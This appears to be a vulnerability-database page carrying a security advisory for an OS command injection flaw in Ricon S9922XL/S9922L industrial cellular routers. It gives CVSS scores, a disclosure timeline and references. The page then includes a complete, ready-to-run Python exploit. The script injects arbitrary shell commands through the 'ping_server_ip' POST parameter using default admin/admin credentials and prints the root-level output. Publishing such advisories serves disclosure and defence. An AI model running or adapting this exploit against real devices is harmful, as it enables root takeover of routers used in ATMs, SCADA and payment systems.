Gjoko KrsticZSL-2021-5653Ricon Industrial Cellular Router S9922XL Remote Command Execution
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
52.7%
Title: Ricon Industrial Cellular Router S9922XL Remote Command Execution
Advisory ID: ZSL-2021-5653
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 04.07.2021
Summary
S9922L series LTE router is designed and manufactured by Ricon Mobile Inc., it based on 3G/LTE cellular network technology with industrial class quality. With its embedded cellular module, it widely used in multiple case like ATM connection, remote office security connection, data collection, etc.
The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi and VPN technologies. Powerful 64-bit Processor and integrated real-time operating system specially developed by Ricon Mobile. S9922XL is widely used in many areas such as intelligent transportation, scada, POS, industrial automation, telemetry, finance, environmental protection.
Description
The router suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the admin (root) user via the ‘ping_server_ip’ POST parameter. Also vulnerable to Heartbleed.
Vendor
Ricon Mobile Inc. - <https://www.riconmobile.com>
Affected Version
Model: S9922XL and S9922L
Firmware: 16.10.3
Tested On
GNU/Linux 2.6.36 (mips)
WEB-ROUTER
Vendor Status
[02.07.2021] Vulnerability discovered.
[02.07.2021] Vendor contacted.
[03.07.2021] No response from the vendor.
[04.07.2021] Public security advisory released.
[07.03.2022] Vendor releases version 16.10.3 (4360) to address this issue.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.exploit-db.com/exploits/50096>
[2] <https://packetstormsecurity.com/files/163390/>
[3] <https://cxsecurity.com/issue/WLB-2021070038>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/204901>
[5] <https://www.cisa.gov/uscert/ics/advisories/icsa-22-032-01>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2022-0365>
[7] <https://vulners.com/cve/CVE-2022-0365>
[8] <https://riconmobile.com/blog/new-firmware-release-notification>
[9] <https://jvn.jp/vu/JVNVU93682644/>
[10] <https://www.isssource.com/hole-in-ricon-mobile-industrial-cellular-router/>
Changelog
[04.07.2021] - Initial release
[07.07.2021] - Added reference [1], [2], [3] and [4]
[01.02.2022] - Added reference [5], [6] and [7]
[07.03.2022] - Added vendor status and reference [8] and [9]
[08.09.2022] - Added reference [10]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
# Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
# WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#
import requests,sys,re
if len(sys.argv)<3:
print("Ricon Industrial Routers RCE")
print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)
else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class' :'admin',
'submit_button' :'netTest',
'submit_type' :'',
'action' :'Apply',
'change_action' :'',
'is_ping' :'0',
'ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
</p></body></html>Related
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
52.7%